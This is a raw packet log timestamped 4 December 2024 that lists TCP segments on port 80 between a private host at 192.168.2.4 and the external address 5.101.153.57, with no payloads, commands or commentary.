Dec 4, 2024 12:16:05.528172016 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.531438112 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.531491041 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.531630993 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.535489082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.535547972 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.535667896 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.538933039 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.538980961 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.539066076 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.542344093 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.542396069 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.542556047 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.545619965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.545684099 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.545808077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.549272060 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.549319983 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.549452066 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.553044081 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.553090096 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.553227901 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.556312084 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.556375980 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.556435108 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.560210943 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.560256004 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.560389042 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.563379049 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.563429117 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.563554049 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.566946983 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.567013979 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.661365032 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.661513090 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.661586046 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.662703991 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.662928104 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.662981033 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.665570021 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.665796041 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.665848970 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.668359041 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.668540955 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.668593884 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.670998096 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.671227932 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.671274900 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.673660040 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.673856974 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.673922062 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.676388025 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.676661968 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.676707983 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.679020882 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.679263115 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.679316998 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.681483984 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.681740046 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.681787968 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.683988094 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.684170961 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.684237003 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.686573982 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.686821938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.686865091 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.688999891 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.689196110 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.689248085 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.691464901 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.691950083 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.692001104 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.693825006 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.694108963 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.694155931 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.696450949 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.696464062 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.696531057 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.698636055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.698947906 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.699001074 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.700979948 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.701186895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.701232910 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.703499079 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.703780890 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.703849077 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.705889940 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.706052065 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.706103086 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.708178043 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.708399057 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.708471060 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.710534096 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.710748911 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.710794926 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.712929010 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.713135004 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.713184118 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.715307951 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.715531111 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.715576887 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.718157053 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.718311071 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.718360901 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.720109940 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.720293999 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.720355034 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.722615004 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.722789049 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.722836018 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.724873066 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.725157022 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.725207090 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.727247000 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.727442980 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.727485895 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.729666948 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.729854107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.729902029 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.732021093 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.732228994 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.732276917 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.734390974 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.734605074 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.734653950 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.736789942 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.737040043 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.737090111 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.739296913 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.739476919 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.739523888 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.741566896 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.741770029 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.741827011 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.743949890 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.744168043 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.744210005 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.746339083 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.746545076 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.746592045 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.748745918 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.748934031 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.748984098 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.751132965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.751332045 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.751386881 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.753520012 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.753707886 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.753774881 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.755913973 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.756087065 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.756134987 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.758250952 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.758452892 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.758505106 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.760648012 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.760862112 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.760915995 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.763066053 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.763331890 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.763380051 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.765424013 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.765635967 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.765702009 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.767818928 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.768037081 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.768086910 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.770220041 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.770451069 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.770502090 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.772584915 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.772780895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.772829056 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.775000095 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.775202036 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.775249004 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.777407885 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.777669907 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.777734995 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.780018091 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.780129910 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.780179024 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.782227039 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.782442093 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.782476902 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.784605026 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.784872055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.784909010 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.786920071 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.840760946 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.865551949 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.865703106 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.865793943 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.866296053 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.866514921 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.866565943 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.868104935 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.868302107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.868357897 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.869883060 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.870059013 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.870115995 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.871634007 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.871839046 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.871891022 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.873373032 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.873565912 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.873609066 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.875088930 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.875292063 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.875329018 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.876780987 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.876982927 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.877039909 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.878494978 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.878699064 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.878741026 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.880162954 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.880403996 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.880443096 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.881819010 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.882039070 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.882081985 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.883435965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.883647919 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.883698940 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.885056973 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.885288954 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.885339975 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.886687994 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.886888981 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.886941910 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.888283014 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.888518095 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.888595104 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.890362024 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.890621901 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.890677929 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.891794920 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.891918898 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.891966105 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.893101931 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.893254042 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.893302917 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.894587994 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.894798994 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.894846916 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.896159887 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.896358013 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.896408081 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.897661924 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.897882938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.897938967 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.899226904 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.899424076 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.899490118 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.900734901 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.900937080 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.900983095 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.902230978 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.902450085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.902497053 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.903800011 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.903951883 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.904001951 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.905241013 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.905426979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.905472994 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.906815052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.907080889 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.907123089 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.908412933 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.908637047 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.908687115 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.909694910 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.909899950 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.909962893 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.911170959 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.911405087 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.911453009 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.912599087 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.912815094 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.912864923 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.914072037 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.914273977 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.914335012 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.915659904 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.915821075 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.915872097 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.917212963 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.917383909 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.917426109 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.918479919 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.918694973 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.918749094 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.919981956 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.920166969 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.920212030 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.921366930 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.921602011 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.921646118 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.922852039 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.923073053 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.923118114 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.924319983 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.924520016 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.924561977 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.925832987 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.926001072 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.926052094 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.927297115 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.927488089 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.927530050 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.928735018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.928931952 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.928977966 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.930213928 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.930398941 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.930445910 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.931850910 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.932060957 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.932109118 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.933465958 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.933650017 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.933698893 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.934803009 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.935014963 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.935055017 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.936439991 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.936556101 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.936594009 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.937911987 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.938195944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.938256025 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.939346075 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.939549923 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.939596891 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.940506935 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.940699100 CET	80	49730	5.101.153.57	192.168.2.4
